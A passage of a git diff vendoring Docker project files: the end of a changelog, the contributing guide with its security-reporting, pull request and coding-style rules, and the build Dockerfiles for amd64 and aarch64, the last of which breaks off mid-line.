cgroup memory is not + +#### Documentation + +* Various improvements ++ New example: sharing data between 2 couchdb databases + +#### Other + +* Vagrant: Use only one deb line in /etc/apt ++ Registry: Implement the new registry + +## 0.2.2 (2013-05-03) + ++ Support for data volumes ('docker run -v=PATH') ++ Share data volumes between containers ('docker run -volumes-from') ++ Improve documentation +* Upgrade to Go 1.0.3 +* Various upgrades to the dev environment for contributors + +## 0.2.1 (2013-05-01) + ++ 'docker commit -run' bundles a layer with default runtime options: command, ports etc. +* Improve install process on Vagrant ++ New Dockerfile operation: "maintainer" ++ New Dockerfile operation: "expose" ++ New Dockerfile operation: "cmd" ++ Contrib script to build a Debian base layer ++ 'docker -d -r': restart crashed containers at daemon startup +* Runtime: improve test coverage + +## 0.2.0 (2013-04-23) + +- Runtime: ghost containers can be killed and waited for +* Documentation: update install instructions +- Packaging: fix Vagrantfile +- Development: automate releasing binaries and ubuntu packages ++ Add a changelog +- Various bugfixes + +## 0.1.8 (2013-04-22) + +- Dynamically detect cgroup capabilities +- Issue stability warning on kernels <3.8 +- 'docker push' buffers on disk instead of memory +- Fix 'docker diff' for removed files +- Fix 'docker stop' for ghost containers +- Fix handling of pidfile +- Various bugfixes and stability improvements + +## 0.1.7 (2013-04-18) + +- Container ports are available on localhost +- 'docker ps' shows allocated TCP ports +- Contributors can run 'make hack' to start a continuous integration VM +- Streamline ubuntu packaging & uploading +- Various bugfixes and stability improvements + +## 0.1.6 (2013-04-17) + +- Record the author an image with 'docker commit -author' + +## 0.1.5 (2013-04-17) + +- Disable standalone mode +- Use a custom DNS resolver with 'docker -d -dns' +- Detect ghost containers +- Improve diagnosis of missing system capabilities +- Allow disabling memory limits at compile time +- Add debian packaging +- Documentation: installing on Arch Linux +- Documentation: running Redis on docker +- Fix lxc 0.9 compatibility +- Automatically load aufs module +- Various bugfixes and stability improvements + +## 0.1.4 (2013-04-09) + +- Full support for TTY emulation +- Detach from a TTY session with the escape sequence `C-p C-q` +- Various bugfixes and stability improvements +- Minor UI improvements +- Automatically create our own bridge interface 'docker0' + +## 0.1.3 (2013-04-04) + +- Choose TCP frontend port with '-p :PORT' +- Layer format is versioned +- Major reliability improvements to the process manager +- Various bugfixes and stability improvements + +## 0.1.2 (2013-04-03) + +- Set container hostname with 'docker run -h' +- Selective attach at run with 'docker run -a [stdin[,stdout[,stderr]]]' +- Various bugfixes and stability improvements +- UI polish +- Progress bar on push/pull +- Use XZ compression by default +- Make IP allocator lazy + +## 0.1.1 (2013-03-31) + +- Display shorthand IDs for convenience +- Stabilize process management +- Layers can include a commit message +- Simplified 'docker attach' +- Fix support for re-attaching +- Various bugfixes and stability improvements +- Auto-download at run +- Auto-login on push +- Beefed up documentation + +## 0.1.0 (2013-03-23) + +Initial public release + +- Implement registry in order to push/pull images +- TCP port allocation +- Fix termcaps on Linux +- Add documentation +- Add Vagrant support with Vagrantfile +- Add unit tests +- Add repository/tags to ease image management +- Improve the layer implementation diff --git a/vendor/github.com/docker/docker/CONTRIBUTING.md b/vendor/github.com/docker/docker/CONTRIBUTING.md new file mode 100644 index 0000000000..eb5f8ab0e9 --- /dev/null +++ b/vendor/github.com/docker/docker/CONTRIBUTING.md @@ -0,0 +1,401 @@ +# Contributing to Docker + +Want to hack on Docker? Awesome! We have a contributor's guide that explains +[setting up a Docker development environment and the contribution +process](https://docs.docker.com/opensource/project/who-written-for/). + +[![Contributors guide](docs/static_files/contributors.png)](https://docs.docker.com/opensource/project/who-written-for/) + +This page contains information about reporting issues as well as some tips and +guidelines useful to experienced open source contributors. Finally, make sure +you read our [community guidelines](#docker-community-guidelines) before you +start participating. + +## Topics + +* [Reporting Security Issues](#reporting-security-issues) +* [Design and Cleanup Proposals](#design-and-cleanup-proposals) +* [Reporting Issues](#reporting-other-issues) +* [Quick Contribution Tips and Guidelines](#quick-contribution-tips-and-guidelines) +* [Community Guidelines](#docker-community-guidelines) + +## Reporting security issues + +The Docker maintainers take security seriously. If you discover a security +issue, please bring it to their attention right away! + +Please **DO NOT** file a public issue, instead send your report privately to +[security@docker.com](mailto:security@docker.com). + +Security reports are greatly appreciated and we will publicly thank you for it. +We also like to send gifts—if you're into Docker schwag, make sure to let +us know. We currently do not offer a paid security bounty program, but are not +ruling it out in the future. + + +## Reporting other issues + +A great way to contribute to the project is to send a detailed report when you +encounter an issue. We always appreciate a well-written, thorough bug report, +and will thank you for it! + +Check that [our issue database](https://github.com/docker/docker/issues) +doesn't already include that problem or suggestion before submitting an issue. +If you find a match, you can use the "subscribe" button to get notified on +updates. Do *not* leave random "+1" or "I have this too" comments, as they +only clutter the discussion, and don't help resolving it. However, if you +have ways to reproduce the issue or have additional information that may help +resolving the issue, please leave a comment. + +When reporting issues, always include: + +* The output of `docker version`. +* The output of `docker info`. + +Also include the steps required to reproduce the problem if possible and +applicable. This information will help us review and fix your issue faster. +When sending lengthy log-files, consider posting them as a gist (https://gist.github.com). +Don't forget to remove sensitive data from your logfiles before posting (you can +replace those parts with "REDACTED"). + +## Quick contribution tips and guidelines + +This section gives the experienced contributor some tips and guidelines. + +### Pull requests are always welcome + +Not sure if that typo is worth a pull request? Found a bug and know how to fix +it? Do it! We will appreciate it. Any significant improvement should be +documented as [a GitHub issue](https://github.com/docker/docker/issues) before +anybody starts working on it. + +We are always thrilled to receive pull requests. We do our best to process them +quickly. If your pull request is not accepted on the first try, +don't get discouraged! Our contributor's guide explains [the review process we +use for simple changes](https://docs.docker.com/opensource/workflow/make-a-contribution/). + +### Design and cleanup proposals + +You can propose new designs for existing Docker features. You can also design +entirely new features. We really appreciate contributors who want to refactor or +otherwise cleanup our project. For information on making these types of +contributions, see [the advanced contribution +section](https://docs.docker.com/opensource/workflow/advanced-contributing/) in +the contributors guide. + +We try hard to keep Docker lean and focused. Docker can't do everything for +everybody. This means that we might decide against incorporating a new feature. +However, there might be a way to implement that feature *on top of* Docker. + +### Talking to other Docker users and contributors + + + + + + + + + + + + + + + + + + + + + + + + +
Forums + A public forum for users to discuss questions and explore current design patterns and + best practices about Docker and related projects in the Docker Ecosystem. To participate, + just log in with your Docker Hub account on https://forums.docker.com. +
Internet Relay Chat (IRC) +

+ IRC a direct line to our most knowledgeable Docker users; we have + both the #docker and #docker-dev group on + irc.freenode.net. + IRC is a rich chat protocol but it can overwhelm new users. You can search + our chat archives. +

+

+ Read our IRC quickstart guide + for an easy way to get started. +

+
Google Group + The docker-dev + group is for contributors and other people contributing to the Docker project. + You can join them without a google account by sending an email to + docker-dev+subscribe@googlegroups.com. + After receiving the join-request message, you can simply reply to that to confirm the subscription. +
Twitter + You can follow Docker's Twitter feed + to get updates on our products. You can also tweet us questions or just + share blogs or stories. +
Stack Overflow + Stack Overflow has over 17000 Docker questions listed. We regularly + monitor Docker questions + and so do many other knowledgeable Docker users. +
+ + +### Conventions + +Fork the repository and make changes on your fork in a feature branch: + +- If it's a bug fix branch, name it XXXX-something where XXXX is the number of + the issue. +- If it's a feature branch, create an enhancement issue to announce + your intentions, and name it XXXX-something where XXXX is the number of the + issue. + +Submit unit tests for your changes. Go has a great test framework built in; use +it! Take a look at existing tests for inspiration. [Run the full test +suite](https://docs.docker.com/opensource/project/test-and-docs/) on your branch before +submitting a pull request. + +Update the documentation when creating or modifying features. Test your +documentation changes for clarity, concision, and correctness, as well as a +clean documentation build. See our contributors guide for [our style +guide](https://docs.docker.com/opensource/doc-style) and instructions on [building +the documentation](https://docs.docker.com/opensource/project/test-and-docs/#build-and-test-the-documentation). + +Write clean code. Universally formatted code promotes ease of writing, reading, +and maintenance. Always run `gofmt -s -w file.go` on each changed file before +committing your changes. Most editors have plug-ins that do this automatically. + +Pull request descriptions should be as clear as possible and include a reference +to all the issues that they address. + +Commit messages must start with a capitalized and short summary (max. 50 chars) +written in the imperative, followed by an optional, more detailed explanatory +text which is separated from the summary by an empty line. + +Code review comments may be added to your pull request. Discuss, then make the +suggested modifications and push additional commits to your feature branch. Post +a comment after pushing. New commits show up in the pull request automatically, +but the reviewers are notified only when you comment. + +Pull requests must be cleanly rebased on top of master without multiple branches +mixed into the PR. + +**Git tip**: If your PR no longer merges cleanly, use `rebase master` in your +feature branch to update your pull request rather than `merge master`. + +Before you make a pull request, squash your commits into logical units of work +using `git rebase -i` and `git push -f`. A logical unit of work is a consistent +set of patches that should be reviewed together: for example, upgrading the +version of a vendored dependency and taking advantage of its now available new +feature constitute two separate units of work. Implementing a new function and +calling it in another file constitute a single logical unit of work. The very +high majority of submissions should have a single commit, so if in doubt: squash +down to one. + +After every commit, [make sure the test suite passes] +(https://docs.docker.com/opensource/project/test-and-docs/). Include documentation +changes in the same pull request so that a revert would remove all traces of +the feature or fix. + +Include an issue reference like `Closes #XXXX` or `Fixes #XXXX` in commits that +close an issue. Including references automatically closes the issue on a merge. + +Please do not add yourself to the `AUTHORS` file, as it is regenerated regularly +from the Git history. + +Please see the [Coding Style](#coding-style) for further guidelines. + +### Merge approval + +Docker maintainers use LGTM (Looks Good To Me) in comments on the code review to +indicate acceptance. + +A change requires LGTMs from an absolute majority of the maintainers of each +component affected. For example, if a change affects `docs/` and `registry/`, it +needs an absolute majority from the maintainers of `docs/` AND, separately, an +absolute majority of the maintainers of `registry/`. + +For more details, see the [MAINTAINERS](MAINTAINERS) page. + +### Sign your work + +The sign-off is a simple line at the end of the explanation for the patch. Your +signature certifies that you wrote the patch or otherwise have the right to pass +it on as an open-source patch. The rules are pretty simple: if you can certify +the below (from [developercertificate.org](http://developercertificate.org/)): + +``` +Developer Certificate of Origin +Version 1.1 + +Copyright (C) 2004, 2006 The Linux Foundation and its contributors. +1 Letterman Drive +Suite D4700 +San Francisco, CA, 94129 + +Everyone is permitted to copy and distribute verbatim copies of this +license document, but changing it is not allowed. + +Developer's Certificate of Origin 1.1 + +By making a contribution to this project, I certify that: + +(a) The contribution was created in whole or in part by me and I + have the right to submit it under the open source license + indicated in the file; or + +(b) The contribution is based upon previous work that, to the best + of my knowledge, is covered under an appropriate open source + license and I have the right under that license to submit that + work with modifications, whether created in whole or in part + by me, under the same open source license (unless I am + permitted to submit under a different license), as indicated + in the file; or + +(c) The contribution was provided directly to me by some other + person who certified (a), (b) or (c) and I have not modified + it. + +(d) I understand and agree that this project and the contribution + are public and that a record of the contribution (including all + personal information I submit with it, including my sign-off) is + maintained indefinitely and may be redistributed consistent with + this project or the open source license(s) involved. +``` + +Then you just add a line to every git commit message: + + Signed-off-by: Joe Smith + +Use your real name (sorry, no pseudonyms or anonymous contributions.) + +If you set your `user.name` and `user.email` git configs, you can sign your +commit automatically with `git commit -s`. + +### How can I become a maintainer? + +The procedures for adding new maintainers are explained in the +global [MAINTAINERS](https://github.com/docker/opensource/blob/master/MAINTAINERS) +file in the [https://github.com/docker/opensource/](https://github.com/docker/opensource/) +repository. + +Don't forget: being a maintainer is a time investment. Make sure you +will have time to make yourself available. You don't have to be a +maintainer to make a difference on the project! + +## Docker community guidelines + +We want to keep the Docker community awesome, growing and collaborative. We need +your help to keep it that way. To help with this we've come up with some general +guidelines for the community as a whole: + +* Be nice: Be courteous, respectful and polite to fellow community members: + no regional, racial, gender, or other abuse will be tolerated. We like + nice people way better than mean ones! + +* Encourage diversity and participation: Make everyone in our community feel + welcome, regardless of their background and the extent of their + contributions, and do everything possible to encourage participation in + our community. + +* Keep it legal: Basically, don't get us in trouble. Share only content that + you own, do not share private or sensitive information, and don't break + the law. + +* Stay on topic: Make sure that you are posting to the correct channel and + avoid off-topic discussions. Remember when you update an issue or respond + to an email you are potentially sending to a large number of people. Please + consider this before you update. Also remember that nobody likes spam. + +* Don't send email to the maintainers: There's no need to send email to the + maintainers to ask them to investigate an issue or to take a look at a + pull request. Instead of sending an email, GitHub mentions should be + used to ping maintainers to review a pull request, a proposal or an + issue. + +### Guideline violations — 3 strikes method + +The point of this section is not to find opportunities to punish people, but we +do need a fair way to deal with people who are making our community suck. + +1. First occurrence: We'll give you a friendly, but public reminder that the + behavior is inappropriate according to our guidelines. + +2. Second occurrence: We will send you a private message with a warning that + any additional violations will result in removal from the community. + +3. Third occurrence: Depending on the violation, we may need to delete or ban + your account. + +**Notes:** + +* Obvious spammers are banned on first occurrence. If we don't do this, we'll + have spam all over the place. + +* Violations are forgiven after 6 months of good behavior, and we won't hold a + grudge. + +* People who commit minor infractions will get some education, rather than + hammering them in the 3 strikes process. + +* The rules apply equally to everyone in the community, no matter how much + you've contributed. + +* Extreme violations of a threatening, abusive, destructive or illegal nature + will be addressed immediately and are not subject to 3 strikes or forgiveness. + +* Contact abuse@docker.com to report abuse or appeal violations. In the case of + appeals, we know that mistakes happen, and we'll work with you to come up with a + fair solution if there has been a misunderstanding. + +## Coding Style + +Unless explicitly stated, we follow all coding guidelines from the Go +community. While some of these standards may seem arbitrary, they somehow seem +to result in a solid, consistent codebase. + +It is possible that the code base does not currently comply with these +guidelines. We are not looking for a massive PR that fixes this, since that +goes against the spirit of the guidelines. All new contributions should make a +best effort to clean up and make the code base better than they left it. +Obviously, apply your best judgement. Remember, the goal here is to make the +code base easier for humans to navigate and understand. Always keep that in +mind when nudging others to comply. + +The rules: + +1. All code should be formatted with `gofmt -s`. +2. All code should pass the default levels of + [`golint`](https://github.com/golang/lint). +3. All code should follow the guidelines covered in [Effective + Go](http://golang.org/doc/effective_go.html) and [Go Code Review + Comments](https://github.com/golang/go/wiki/CodeReviewComments). +4. Comment the code. Tell us the why, the history and the context. +5. Document _all_ declarations and methods, even private ones. Declare + expectations, caveats and anything else that may be important. If a type + gets exported, having the comments already there will ensure it's ready. +6. Variable name length should be proportional to its context and no longer. + `noCommaALongVariableNameLikeThisIsNotMoreClearWhenASimpleCommentWouldDo`. + In practice, short methods will have short variable names and globals will + have longer names. +7. No underscores in package names. If you need a compound name, step back, + and re-examine why you need a compound name. If you still think you need a + compound name, lose the underscore. +8. No utils or helpers packages. If a function is not general enough to + warrant its own package, it has not been written generally enough to be a + part of a util package. Just leave it unexported and well-documented. +9. All tests should run with `go test` and outside tooling should not be + required. No, we don't need another unit testing framework. Assertion + packages are acceptable if they provide _real_ incremental value. +10. Even though we call these "rules" above, they are actually just + guidelines. Since you've read all the rules, you now know that. + +If you are having trouble getting into the mood of idiomatic Go, we recommend +reading through [Effective Go](https://golang.org/doc/effective_go.html). The +[Go Blog](https://blog.golang.org) is also a great resource. Drinking the +kool-aid is a lot easier than going thirsty. diff --git a/vendor/github.com/docker/docker/Dockerfile b/vendor/github.com/docker/docker/Dockerfile new file mode 100644 index 0000000000..ce2d702807 --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile @@ -0,0 +1,246 @@ +# This file describes the standard way to build Docker, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# # Publish a release: +# docker run --privileged \ +# -e AWS_S3_BUCKET=baz \ +# -e AWS_ACCESS_KEY=foo \ +# -e AWS_SECRET_KEY=bar \ +# -e GPG_PASSPHRASE=gloubiboulga \ +# docker hack/release.sh +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. +# + +FROM debian:jessie + +# allow replacing httpredir or deb mirror +ARG APT_MIRROR=deb.debian.org +RUN sed -ri "s/(httpredir|deb).debian.org/$APT_MIRROR/g" /etc/apt/sources.list + +# Add zfs ppa +RUN apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys E871F18B51E0147C77796AC81196BA81F6B0FC61 \ + || apt-key adv --keyserver hkp://pgp.mit.edu:80 --recv-keys E871F18B51E0147C77796AC81196BA81F6B0FC61 +RUN echo deb http://ppa.launchpad.net/zfs-native/stable/ubuntu trusty main > /etc/apt/sources.list.d/zfs.list + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + apt-utils \ + aufs-tools \ + automake \ + bash-completion \ + binutils-mingw-w64 \ + bsdmainutils \ + btrfs-tools \ + build-essential \ + clang \ + cmake \ + createrepo \ + curl \ + dpkg-sig \ + gcc-mingw-w64 \ + git \ + iptables \ + jq \ + libapparmor-dev \ + libcap-dev \ + libltdl-dev \ + libnl-3-dev \ + libprotobuf-c0-dev \ + libprotobuf-dev \ + libsqlite3-dev \ + libsystemd-journal-dev \ + libtool \ + mercurial \ + net-tools \ + pkg-config \ + protobuf-compiler \ + protobuf-c-compiler \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + ubuntu-zfs \ + xfsprogs \ + vim-common \ + libzfs-dev \ + tar \ + zip \ + --no-install-recommends \ + && pip install awscli==1.10.15 +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Configure the container for OSX cross compilation +ENV OSX_SDK MacOSX10.11.sdk +ENV OSX_CROSS_COMMIT a9317c18a3a457ca0a657f08cc4d0d43c6cf8953 +RUN set -x \ + && export OSXCROSS_PATH="/osxcross" \ + && git clone https://github.com/tpoechtrager/osxcross.git $OSXCROSS_PATH \ + && ( cd $OSXCROSS_PATH && git checkout -q $OSX_CROSS_COMMIT) \ + && curl -sSL https://s3.dockerproject.org/darwin/v2/${OSX_SDK}.tar.xz -o "${OSXCROSS_PATH}/tarballs/${OSX_SDK}.tar.xz" \ + && UNATTENDED=yes OSX_VERSION_MIN=10.6 ${OSXCROSS_PATH}/build.sh +ENV PATH /osxcross/target/bin:$PATH + +# Install seccomp: the version shipped in trusty is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Install Go +# IMPORTANT: If the version of Go is updated, the Windows to Linux CI machines +# will need updating, to avoid errors. Ping #docker-maintainers on IRC +# with a heads-up. +ENV GO_VERSION 1.7.5 +RUN curl -fsSL "https://golang.org/dl/go${GO_VERSION}.linux-amd64.tar.gz" \ + | tar -xzC /usr/local + +ENV PATH /go/bin:/usr/local/go/bin:$PATH +ENV GOPATH /go + +# Compile Go for cross compilation +ENV DOCKER_CROSSPLATFORMS \ + linux/386 linux/arm \ + darwin/amd64 \ + freebsd/amd64 freebsd/386 freebsd/arm \ + windows/amd64 windows/386 \ + solaris/amd64 + +# Dependency for golint +ENV GO_TOOLS_COMMIT 823804e1ae08dbb14eb807afc7db9993bc9e3cc3 +RUN git clone https://github.com/golang/tools.git /go/src/golang.org/x/tools \ + && (cd /go/src/golang.org/x/tools && git checkout -q $GO_TOOLS_COMMIT) + +# Grab Go's lint tool +ENV GO_LINT_COMMIT 32a87160691b3c96046c0c678fe57c5bef761456 +RUN git clone https://github.com/golang/lint.git /go/src/github.com/golang/lint \ + && (cd /go/src/github.com/golang/lint && git checkout -q $GO_LINT_COMMIT) \ + && go install -v github.com/golang/lint/golint + +# Install CRIU for checkpoint/restore support +ENV CRIU_VERSION 2.2 +RUN mkdir -p /usr/src/criu \ + && curl -sSL https://github.com/xemul/criu/archive/v${CRIU_VERSION}.tar.gz | tar -v -C /usr/src/criu/ -xz --strip-components=1 \ + && cd /usr/src/criu \ + && make \ + && make install-criu + +# Install two versions of the registry. The first is an older version that +# only supports schema1 manifests. The second is a newer version that supports +# both. This allows integration-cli tests to cover push/pull with both schema1 +# and schema2 manifests. +ENV REGISTRY_COMMIT_SCHEMA1 ec87e9b6971d831f0eff752ddb54fb64693e51cd +ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT_SCHEMA1") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2-schema1 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Install yamllint for validating swagger.yaml +RUN pip install yamllint==1.5.0 + +# Install go-swagger for validating swagger.yaml +ENV GO_SWAGGER_COMMIT c28258affb0b6251755d92489ef685af8d4ff3eb +RUN git clone https://github.com/go-swagger/go-swagger.git /go/src/github.com/go-swagger/go-swagger \ + && (cd /go/src/github.com/go-swagger/go-swagger && git checkout -q $GO_SWAGGER_COMMIT) \ + && go install -v github.com/go-swagger/go-swagger/cmd/swagger + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS apparmor pkcs11 seccomp selinux + +# Let us use a .bashrc file +RUN ln -sfv $PWD/.bashrc ~/.bashrc +# Add integration helps to bashrc +RUN echo "source $PWD/hack/make/.integration-test-helpers" >> /etc/bash.bashrc + +# Register Docker's bash completion. +RUN ln -sv $PWD/contrib/completion/bash/docker /etc/bash_completion.d/docker + +# Get useful and necessary Hub images so we can "docker load" locally instead of pulling +COPY contrib/download-frozen-image-v2.sh /go/src/github.com/docker/docker/contrib/ +RUN ./contrib/download-frozen-image-v2.sh /docker-frozen-images \ + buildpack-deps:jessie@sha256:25785f89240fbcdd8a74bdaf30dd5599a9523882c6dfc567f2e9ef7cf6f79db6 \ + busybox:latest@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0 \ + debian:jessie@sha256:f968f10b4b523737e253a97eac59b0d1420b5c19b69928d35801a6373ffe330e \ + hello-world:latest@sha256:8be990ef2aeb16dbcb9271ddfe2610fa6658d13f6dfb8bc72074cc1ca36966a7 +# See also "hack/make/.ensure-frozen-images" (which needs to be updated any time this list is) + +# Install tomlv, vndr, runc, containerd, tini, docker-proxy +# Please edit hack/dockerfile/install-binaries.sh to update them. +COPY hack/dockerfile/binaries-commits /tmp/binaries-commits +COPY hack/dockerfile/install-binaries.sh /tmp/install-binaries.sh +RUN /tmp/install-binaries.sh tomlv vndr runc containerd tini proxy bindata + +# Wrap all commands in the "docker-in-docker" script to allow nested containers +ENTRYPOINT ["hack/dind"] + +# Upload docker source +COPY . /go/src/github.com/docker/docker diff --git a/vendor/github.com/docker/docker/Dockerfile.aarch64 b/vendor/github.com/docker/docker/Dockerfile.aarch64 new file mode 100644 index 0000000000..6112f802f7 --- /dev/null +++ b/vendor/github.com/docker/docker/Dockerfile.aarch64 @@ -0,0 +1,175 @@ +# This file describes the standard way to build Docker on aarch64, using docker +# +# Usage: +# +# # Assemble the full dev environment. This is slow the first time. +# docker build -t docker -f Dockerfile.aarch64 . +# +# # Mount your source in an interactive container for quick testing: +# docker run -v `pwd`:/go/src/github.com/docker/docker --privileged -i -t docker bash +# +# # Run the test suite: +# docker run --privileged docker hack/make.sh test-unit test-integration-cli test-docker-py +# +# Note: AppArmor used to mess with privileged mode, but this is no longer +# the case. Therefore, you don't have to disable it anymore. +# + +FROM aarch64/ubuntu:wily + +# Packaged dependencies +RUN apt-get update && apt-get install -y \ + apparmor \ + aufs-tools \ + automake \ + bash-completion \ + btrfs-tools \ + build-essential \ + cmake \ + createrepo \ + curl \ + dpkg-sig \ + g++ \ + gcc \ + git \ + iptables \ + jq \ + libapparmor-dev \ + libc6-dev \ + libcap-dev \ + libltdl-dev \ + libsqlite3-dev \ + libsystemd-dev \ + mercurial \ + net-tools \ + parallel \ + pkg-config \ + python-dev \ + python-mock \ + python-pip \ + python-websocket \ + gccgo \ + iproute2 \ + iputils-ping \ + vim-common \ + --no-install-recommends + +# Get lvm2 source for compiling statically +ENV LVM2_VERSION 2.02.103 +RUN mkdir -p /usr/local/lvm2 \ + && curl -fsSL "https://mirrors.kernel.org/sourceware/lvm2/LVM2.${LVM2_VERSION}.tgz" \ + | tar -xzC /usr/local/lvm2 --strip-components=1 +# See https://git.fedorahosted.org/cgit/lvm2.git/refs/tags for release tags + +# Fix platform enablement in lvm2 to support aarch64 properly +RUN set -e \ + && for f in config.guess config.sub; do \ + curl -fsSL -o "/usr/local/lvm2/autoconf/$f" "http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=$f;hb=HEAD"; \ + done +# "arch.c:78:2: error: #error the arch code needs to know about your machine type" + +# Compile and install lvm2 +RUN cd /usr/local/lvm2 \ + && ./configure \ + --build="$(gcc -print-multiarch)" \ + --enable-static_link \ + && make device-mapper \ + && make install_device-mapper +# See https://git.fedorahosted.org/cgit/lvm2.git/tree/INSTALL + +# Install seccomp: the version shipped in trusty is too old +ENV SECCOMP_VERSION 2.3.1 +RUN set -x \ + && export SECCOMP_PATH="$(mktemp -d)" \ + && curl -fsSL "https://github.com/seccomp/libseccomp/releases/download/v${SECCOMP_VERSION}/libseccomp-${SECCOMP_VERSION}.tar.gz" \ + | tar -xzC "$SECCOMP_PATH" --strip-components=1 \ + && ( \ + cd "$SECCOMP_PATH" \ + && ./configure --prefix=/usr/local \ + && make \ + && make install \ + && ldconfig \ + ) \ + && rm -rf "$SECCOMP_PATH" + +# Install Go +# We don't have official binary tarballs for ARM64, eigher for Go or bootstrap, +# so we use gccgo as bootstrap to build Go from source code. +# We don't use the official ARMv6 released binaries as a GOROOT_BOOTSTRAP, because +# not all ARM64 platforms support 32-bit mode. 32-bit mode is optional for ARMv8. +ENV GO_VERSION 1.7.5 +RUN mkdir /usr/src/go && curl -fsSL https://golang.org/dl/go${GO_VERSION}.src.tar.gz | tar -v -C /usr/src/go -xz --strip-components=1 \ + && cd /usr/src/go/src \ + && GOOS=linux GOARCH=arm64 GOROOT_BOOTSTRAP="$(go env GOROOT)" ./make.bash + +ENV PATH /usr/src/go/bin:$PATH +ENV GOPATH /go + +# Only install one version of the registry, because old version which support +# schema1 manifests is not working on ARM64, we should skip integration-cli +# tests for schema1 manifests on ARM64. +ENV REGISTRY_COMMIT 47a064d4195a9b56133891bbb13620c3ac83a827 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/distribution.git "$GOPATH/src/github.com/docker/distribution" \ + && (cd "$GOPATH/src/github.com/docker/distribution" && git checkout -q "$REGISTRY_COMMIT") \ + && GOPATH="$GOPATH/src/github.com/docker/distribution/Godeps/_workspace:$GOPATH" \ + go build -o /usr/local/bin/registry-v2 github.com/docker/distribution/cmd/registry \ + && rm -rf "$GOPATH" + +# Install notary and notary-server +ENV NOTARY_VERSION v0.4.2 +RUN set -x \ + && export GOPATH="$(mktemp -d)" \ + && git clone https://github.com/docker/notary.git "$GOPATH/src/github.com/docker/notary" \ + && (cd "$GOPATH/src/github.com/docker/notary" && git checkout -q "$NOTARY_VERSION") \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary-server github.com/docker/notary/cmd/notary-server \ + && GOPATH="$GOPATH/src/github.com/docker/notary/vendor:$GOPATH" \ + go build -o /usr/local/bin/notary github.com/docker/notary/cmd/notary \ + && rm -rf "$GOPATH" + +# Get the "docker-py" source so we can run their integration tests +ENV DOCKER_PY_COMMIT e2655f658408f9ad1f62abdef3eb6ed43c0cf324 +RUN git clone https://github.com/docker/docker-py.git /docker-py \ + && cd /docker-py \ + && git checkout -q $DOCKER_PY_COMMIT \ + && pip install -r test-requirements.txt + +# Set user.email so crosbymichael's in-container merge commits go smoothly +RUN git config --global user.email 'docker-dummy@example.com' + +# Add an unprivileged user to be used for tests which need it +RUN groupadd -r docker +RUN useradd --create-home --gid docker unprivilegeduser + +VOLUME /var/lib/docker +WORKDIR /go/src/github.com/docker/docker +ENV DOCKER_BUILDTAGS 